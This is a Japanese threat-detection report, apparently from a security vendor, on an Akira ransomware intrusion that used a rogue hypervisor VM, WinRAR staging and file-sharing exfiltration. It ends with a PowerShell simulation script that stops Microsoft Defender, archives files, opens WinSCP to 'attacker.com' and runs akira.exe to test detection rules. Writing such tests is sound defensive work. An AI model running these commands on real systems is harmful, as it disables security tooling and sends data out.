Akira、LimeWireとデータ外部流出の苦い味
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
Akiraランサムウェアのアフィリエイトがハイパーバイザへの不正アクセスを取得し、新しい仮想マシンを作成して隠密な準備環境として使用しました。攻撃者はこの隔離されたVMを活用し、セキュリティ監視を避け、WinRARでデータを準備し、Easyupload.ioのファイル共有プラットフォームを通じてアーカイブを流出させました。このケースは、脅威アクターがデータ窃盗のために正当なアップロードサービスを引き続き悪用していることを示しています。
調査
調査には、EDRテレメトリ、Windowsイベントログ、Microsoft Edgeの閲覧履歴を組み合わせて侵入を再現しました。アナリストはまた、不正な仮想マシンのVHDXイメージを復元し、攻撃者がMicrosoft Defenderを無効にし、Akiraランサムウェアのオペレーションを設定したことを明らかにしました。VMの法医学的レビューにより、準備段階と流出段階で使用された正確なツール、ウェブサイト、ワークフローが露見しました。
緩和策
組織は環境全体で新規または不正なエンドポイントおよび仮想マシンインスタンスの出現を監視するべきです。ハイパーバイザーやドメインコントローラーなどの重要なシステムへのリモートアクセスには強力な可視性が不可欠です。データ流出に使用される可能性のある既知のファイル共有および迅速なアップロードサービスへのアクセスを制限または徹底的に監視することも重要です。
対応策
ハイパーバイザへの不正アクセスが確認された場合、直ちに該当するハイパーバイザおよび新たに作成された仮想マシンを隔離します。VMディスクイメージの法医学分析を行い、データ準備および流出の範囲を特定します。アクセスログを確認して、初期の侵入点を追跡し、持続的な攻撃者のアクセスが残っていないことを確認します。
攻撃フロー
シミュレーション実行
前提条件:テレメトリとベースラインの事前チェックが通過している必要があります。
根拠:このセクションでは、検出ルールをトリガーするための敵対者技術(TTP)の正確な実行を詳述します。コマンドとナラティブは、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。抽象的または無関係な例を用いると誤診を招く可能性があります。
-
攻撃のナラティブ&コマンド: 敵対者は初期アクセスを取得し、影響を拡大しようとしています。まず、
AdUsers.txtのような既知のテキストファイルをチェックして感度の高いファイルを列挙します。流出の準備のため、WinRAR.exeを使用してデータを圧縮します。そしてエクスフィルトレーションツールWinSCP.exeを準備し、最終的にakira.exeランサムウェアペイロードを実行します。EDR/アンチウイルスがプロセスを中断するのを防ぐために、Windefendサービスを停止しようとします。この特定のコマンドライン引数のシーケンスとサービスステータスの変更は、Akira特有の検出ロジックをトリガーすることを意図しています。 -
リグレッションテストスクリプト:
# Akiraランサムウェア検出検証用シミュレーションスクリプト #注:このスクリプトを実行するには管理者権限が必要です。 Write-Host "[+] Akiraランサムウェアシミュレーション開始..." -ForegroundColor Cyan # 1. 発見/列挙のシミュレーション (T1119) Write-Host "[+] ステップ1:Notepadを介したファイル列挙のシミュレーション..." Start-Process notepad.exe -ArgumentList "AdUsers.txt" Start-Sleep -Seconds 2 # 2. データアーカイブのシミュレーション (T1560.003) # メモ: WinRARが存在すると仮定するか、コマンドラインの活動をシミュレーションします Write-Host "[+] ステップ2:WinRARを使用したデータアーカイブのシミュレーション..." Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt" Start-Sleep -Seconds 2 # 3. エクスフィルトツール準備のシミュレーション (T1105) Write-Host "[+] ステップ3:エクスフィルトツール実行のシミュレーション..." Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com" Start-Sleep -Seconds 2 # 4. ランサムウェア実行のシミュレーション (T1204.002) Write-Host "[+] ステップ4:Akiraペイロード実行のシミュレーション..." Start-Process "akira.exe" Start-Sleep -Seconds 2 # 5. Defender無効化のシミュレーション (T1564.006) # これによりシステムログのEventID 7036がトリガーされます Write-Host "[+] ステップ5:Microsoft Defenderの停止を試みています..." Stop-Service -Name "Windefend" -Force Write-Host "[+] シミュレーション完了。SIEMで警告を確認してください。" -ForegroundColor Green -
クリーンアップコマンド:
# クリーンアップスクリプト Write-Host "[+] シミュレーションアーティファクトのクリーンアップ..." -ForegroundColor Cyan # Defenderサービスの再起動 Start-Service -Name "Windefend" # シミュレーションされたファイルの削除 Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue Write-Host "[+] クリーンアップ完了。" -ForegroundColor Green